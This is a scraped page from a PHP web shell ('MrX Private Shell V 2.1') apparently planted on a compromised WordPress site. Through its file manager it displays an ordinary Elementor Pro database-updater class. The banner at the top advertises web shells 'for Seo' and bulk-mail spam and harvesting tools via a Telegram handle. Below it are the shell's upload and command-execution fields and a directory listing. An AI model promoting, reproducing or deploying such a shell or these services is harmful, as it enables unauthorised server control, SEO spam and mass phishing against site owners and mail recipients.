__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
namespace ElementorPro\Core\Database;

use ElementorPro\Core\Utils\Collection;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

abstract class Base_Database_Updater {
	/**
	 * Run all the 'up' method of the migrations classes if needed, and update the db version.
	 *
	 * @param bool $force When passing true, it ignores the current version and run all the up migrations.
	 */
	public function up( $force = false ) {
		$installed_version = $this->get_installed_version();

		// Up to date. Nothing to do.
		if ( ! $force && $this->get_db_version() <= $installed_version ) {
			return;
		}

		$migrations = $this->get_collected_migrations();

		if ( ! $force ) {
			$migrations = $migrations->filter( function ( $_, $version ) use ( $installed_version ) {
				// Filter all the migrations that already done.
				return $version > $installed_version;
			} );
		}

		$migrations->map( function ( Base_Migration $migration, $version ) {
			$migration->up();

			// In case some migration failed it updates version every migration.
			$this->update_db_version_option( $version );
		} );

		$this->update_db_version_option( $this->get_db_version() );
	}

	/**
	 * Run all the 'down' method of the migrations classes if can, and update the db version.
	 *
	 * @param bool $force When passing true, it ignores the current version and run all the down migrations.
	 */
	public function down( $force = false ) {
		$installed_version = $this->get_installed_version();

		$migrations = $this->get_collected_migrations();

		if ( ! $force ) {
			$migrations = $migrations->filter( function ( $_, $version ) use ( $installed_version ) {
				// Filter all the migrations that was not installed.
				return $version <= $installed_version;
			} );
		}

		$migrations->reverse( true )
			->map( function ( Base_Migration $migration, $version ) {
				$migration->down();

				// In case some migration failed it updates version every migration.
				$this->update_db_version_option( $version );
			} );

		$this->update_db_version_option( 0 );
	}

	/**
	 * Register hooks to activate the migrations.
	 */
	public function register() {
		add_action( 'admin_init', function () {
			$this->up();
		} );
	}

	/**
	 * Update the version in the users DB.
	 *
	 * @param $version
	 */
	protected function update_db_version_option( $version ) {
		update_option( $this->get_db_version_option_name(), $version );
	}

	/**
	 * Get the version that already installed.
	 *
	 * @return int
	 */
	protected function get_installed_version() {
		return intval( get_option( $this->get_db_version_option_name() ) );
	}

	/**
	 * Get all migrations inside a Collection.
	 *
	 * @return Collection
	 */
	protected function get_collected_migrations() {
		return new Collection( $this->get_migrations() );
	}

	/**
	 * The most updated version of the DB.
	 *
	 * @return numeric
	 */
	abstract protected function get_db_version();

	/**
	 * The name of the option that saves the current user DB version.
	 *
	 * @return string
	 */
	abstract protected function get_db_version_option_name();

	/**
	 * Array of migration classes.
	 *
	 * @return Base_Migration[]
	 */
	abstract protected function get_migrations();
}

Filemanager

Name Type Size Permission Actions
base-database-updater.php File 3.13 KB 0664
base-migration.php File 4.44 KB 0664
join-clause.php File 1.61 KB 0664
model-base.php File 3.48 KB 0664
model-query-builder.php File 1.89 KB 0664
query-builder.php File 30.04 KB 0664
Filemanager